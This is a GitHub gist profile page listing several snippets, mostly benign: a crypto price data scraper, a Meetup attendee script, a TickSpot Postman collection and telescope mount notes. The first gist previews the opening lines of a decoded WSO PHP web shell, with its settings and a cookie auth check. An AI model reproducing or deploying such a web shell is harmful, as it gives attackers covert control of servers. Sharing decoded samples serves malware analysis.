Skip to content

Instantly share code, notes, and snippets.

View timucingelici's full-sized avatar

Tim timucingelici

  • London
View GitHub Profile
@timucingelici
timucingelici / wso-so-shell-decoded.php
Created October 13, 2016 10:58
wso-so-shell-decoded
?><?php
$default_action = 'SecInfo';
$color= "#C45F5F";
$default_charset = 'UTF-8';
$default_use_ajax = false;
//$hash = "e10adc3949ba59abbe56e057f20f883e";
if(!empty($_COOKIE['auth'])) echo 'auth-5a808cf';
[
{
"Date":"Jan 16, 2018",
"Open":"13836.10",
"High":"13843.10",
"Low":"10194.90",
"Close":"11490.50",
"Volume":"18,853,800,000",
"Market Cap":"232,517,000,000"
},
@timucingelici
timucingelici / coinmarketcap-dot-com-historical-data-to-json.js
Created January 17, 2018 17:05
Export coinmarketcap.com's historical data as JSON
data = [];
headers = [];
table = $('#historical-data').find('table');
headers = table.find('th').map(function(index, item){
return $(item).text();
});
table.children('tbody').find('tr').each(function(index, item){
@timucingelici
timucingelici / meetup_position_finder.js
Last active November 5, 2019 10:19
Meetup.com attendee list position finder
// 1 - Find your profile ID
// 2 - Replace it with PLACE_YOUR_PROFILE_ID_HERE in the code
// 3 - Open the the attendee list you'd like to check (Going, Not Going or Waitlist)
// 4 - Paste it to your developer console and press enter
// 5 - Voila???
//
// FAQ
// Q: Why?
// A: Why not?
@timucingelici
timucingelici / TICKSPOT.postman_collection.json
Created February 9, 2020 15:39
Postman Collection to fill TickSpot timesheets programmatically
{
"info": {
"_postman_id": "4c2e044f-488c-4f18-968e-c070b36e1364",
"name": "TICKSPOT",
"schema": "https://schema.getpostman.com/json/collection/v2.1.0/collection.json"
},
"item": [
{
"name": "Project ID",
"event": [
@timucingelici
timucingelici / eq6r-eqmod-asiair.md
Last active November 27, 2023 07:12
How to connect EQ6-R Pro to AsiAIR (inc. other Raspberry PI solutions) through USB type B cable

How to connect EQ6-R Pro to AsiAIR (inc. other Raspberry PI solutions) through USB type B cable

Created at: Tuesday, 29th of Dec 2020 Updated at: Saturday, 13th of March 2021

Disclaimer

This document is simply describing my own personal experience and the steps I took to troubleshoot and solve a specific problem.

It also does not provide any guarantees and does not aim to encourage others to violate their vendors/suppliers' terms.